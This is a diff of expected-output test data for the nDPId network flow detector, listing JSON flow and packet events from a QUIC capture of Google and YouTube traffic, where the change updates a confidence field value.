00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463060980301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980301,"pkt":"8IQvSpdgeJKcD6iOCABFAAViG\/5AAEARmp7AqAFprNkQBLJlAbsFTr+DDUPl1BjSnP0KUTAyNQFyZIfG66V5bj99kfIBoAEABENITE8XAAAAUEFEAIgBAABTTkkAlgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5jb21PyGNIiSYlWYMNKJNAlwv39ix54lRFVA6paRsUl4FQy0hWHom6FQQ9JcZPH9joUxX+SDLF1j\/DSdX0UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn06ylDo5Ug9+nOea5qJJts1jMXRdJCxw2QvK85nmQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQarjm3cTKFpJVCrT7eADgKAAAAAFg1MDkAABAAHgAAAMpYWB84oseWX+q27ipmj\/RQLfsZQqQtGKexDF79uuJfAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5Cprnnr7MUAAJJnZtEbkxP245vVr56GfjMCMAwif3n\/lWOThmdSnoedzP2jx+7ZPMWRBUv\/hZavd3FPUhQwHHwpvJJDzRcoSGYXtOQyhcYCVpGlxHD65Db8HFfgEKEx\/YlE\/aFaPqB1XqWWzf4zDCgIc\/Djzy4R\/py4JVjfq9V0ooIkHbH+8mAcpgdNt3gj0SeICAOM6wnOXFVXQaU2KKd\/llBTkdtTIS8p4UckAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980313,"flow_last_seen":1463060980313,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463060980313,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1463060980313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1463060980313,"pkt":"8IQvSpdgeJKcD6iOCABFAACUtgVAAEARBWbAqAFprNkQA54NAbsAgHEsDKM2rKXAEd7wIt3qCq5m3TavpAsTDbAsFGxmQjrMNGgPLp5\/67eBvHP3BJ3FiMAS4anKHt6qD2LZa9lkPD+xi9VHkCY0QuwL2qSbKNzU+YmHNEsRyVDptUSV5HeCE\/peVLnXWfr\/zBYlTVvhdUjE1rsevsCPj6RN"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463060980336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980336,"pkt":"8IQvSpdgeJKcD6iOCABFAAVieqhAAEARTajAqAFp2DrS7oaGAbsFThSMDaSWOQdzcSypUTAyNQHV5wqJLuvacsEa2ggBoAEABENITE8XAAAAUEFEAFEBAABTTkkAYAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cueW91dHViZS5jb205fPBATCqFxnBl7Xv68Z9fD9Nmah0fi4FMd4fkZ11E\/CzEloDogZdL\/nncpFiRZ2yDvER3hyJLRuKPu2yNKulWJLAj1kd1TL1O1ht+4DYSFzHaxW1I0SXh61LEyPn0ZJNHzIO4+v+uSwxJi411oZGLUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0IqnIQgaTDzQq3tVtNNLVAtwTevP964BOlEvwfGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjSzHyexPo2T9WCZD4U6m8alAAAAAFg1MDkAABAAHgAAAGluEpDbken\/KU7Y\/ELsDAQ\/jJay9FDlf0UZ5YuPrPZyAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrcNABADyUl7\/h6mDtG4NsOVvVuJ1PZcqwDa87DQJ80CEFy8NfQNViwNoS56F6e843IHdgyXgGBymFoVuWTPeBJJ3oxBn7RKC7ZZ3lBjoLLbk9XTVRW+SbaYvzMJPMbCMtrqm0FX1EDkyftTNYRo2oN8jHq308RLDWGOdHHpxuN7oxivKsZVduus4FvpUAikTROVWqLCaDklpl4qgg4HMAiksVv2oDrqCwAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463060980349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980349,"pkt":"8IQvSpdgeJKcD6iOCABFAAViOWpAAEARi2bAqAFp2DrWbr09AbsFTixPDZgh\/ntZ+3x4UTAyNQEexu19QA91RUfxOasBoAEABENITE8XAAAAUEFEAD0BAABTTkkASAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb20wbVd\/xJG3uBvID0WAK+ohpx7cyOJ2dtebsPJwjywjfFuGDbC64HOW7daWVAssjrQthDJVGy+I6s+aKoR7mAYJDhdEEUKOBhWT8KdUZ+QsCFwZeIYkra13fPULR+kjxZwRpLY7sCam2MMIw19PW15Bf2xgAD\/plCBqG73f91yMrvU7pcyTjshGUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0h3jC79n8KmTTqLGBqNDsO\/+yFOWZXiuGsfLkAWQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjS7Vl7XCOzOLURPKzlhG40eAAAAAFg1MDkAABAAHgAAAFNDC7W8XmRlWw2IWugDdRStg\/GKmfFye59SXxQJoGstAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrbhIBAFhkMdLsvVn8dBclelTniFgmv7sivZhjmekneMr+6hkdFDGQb\/mkcgr5pmlxB2Adl4UO+Q5ZRPsivx7E2pdvMReaoISz1dlKFlGYuAatdBRMcJaEN+iNYNqPa0KmC4oIMq310RgCpJw2LDB3pVyVeASJBnCusnfTUVrGDsYCI0tVvwmaJscLHqtT1URTpBOCGDqnTS9VwZ\/TQa7YakZ29aLWPRkUAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463060980356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980356,"pkt":"8IQvSpdgeJKcD6iOCABFAAViY+ZAAEARbXXAqAFp2DrJ45xeAbsFTrsoDSo6NO9En0amUTAyNQHxQPc0oXq52GqfzEUBoAEUBUNITE8PAAAAUEFEACcEAABTTkkAOAQAAFZFUgA8BAAAQ0NTAEwEAABNU1BDUAQAAFVBSURwBAAAVENJRHQEAABQRE1EeAQAAFNSQkZ8BAAASUNTTIAEAABTQ0xThAQAAENPUFSIBAAASVJUVIwEAABDRkNXkAQAAFNGQ1eUBAAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLWZvbnRzLmdzdGF0aWMuY29tUTAyNXsm6efkXHH\/AeiBYJKSGuhkAAAAQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQAAAAAWDUwOQAAEAAeAAAAAQAAAEZJWEQ2AwEAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463060980358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":816,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":816,"pkt_l4_len":782,"thread_ts_msec":1463060980358,"pkt":"8IQvSpdgeJKcD6iOCABFAAMieqxAAEART+TAqAFp2DrS7oaGAbsDDnUSDaSWOQdzcSypUTAyNQKic+J8GjVsfJMsdsljddNYUoaFl0z7yC+b\/wr4VU+uLim9cSDoCfQ+BQHWf7axGI\/0otFRZnw6Kt8qBdaHMLIkdKcN8wdByZN\/oxJ5hHJiGBr5fiEEYQesGjd7ktKww8RLAeoDPzO5xHVx6UhHPdcfqLCO0OUirBVeLWv0B2O9yzbQVc1VH+bmliqhUEJvrnRG4cr78AW8g3wScWC4rwYpeJVk\/IAAQQ57Dki1DMwjrpTDHht\/5ZKfx0L6ARDMsMT4o5zF\/akZnbDa0ujEPexxAMZmDGeFTAQkCIMwA\/gA3J1r7aP1KpIssFW81KVjJ5iXRD5YwhMXjujhZlTD7FpkokyBosoiaYQ9OlBELgrsv\/9qDO2wxdYuRfMHHiN5v5dCIbRSeNjSHrD5k38mY1aUywqkMP+2CUbD2epWgY5pAU9yj7pwB44jlPLOPZlRDlPzYteeLN3w3AP\/lAuGaox0e\/nN6hJNNlHNcIQxZHPP2S1Nn2pwslhn\/VZ\/sLfiYbgNEJ7jii0Xgsq+CMf0fQRIuCSQdHqU2jrdN+ANDhT5dE3khD4eoPHs8vCv4BKfMl7gejkwwAW2mHRMOqa7T9bOfmL\/xQjsgJk39nF1RjCMAK12Xi+dtOGE9IgQxbz9zSmgmL2yfIbOnXdI+bTM22zfHQn6FUtzcayZDzqJ6V1SbCofsr53iOUBUvhiUNinYAVziLfoiiMvfHEE5p0lanDdKZb0YpgPqdNQd16jKwJjqhYbmKL4sSrdZfI7oqtHDzJwMafbASoNSGD3Uv4mKwYKsjq2Gt5i5gDh3DTXlk8HfNKd3wJG6rjWcXbXKzMhv54KIsq1aZ1I4i1ag8lQ0v10wAGcat1qElIOAsfiTGWepgC8HR8kDowOKSvfud74VVvyn31uOyJudA\/cCGuSQ\/d7qs9IBWEXiAAAuMK7hXoYMc\/2wJckDypsBIy3x5hskbJa1d0Ahy9jqEdMlnrF69g47VNiGR6icm7nProfol9M2gJRYOL9DgN\/"} 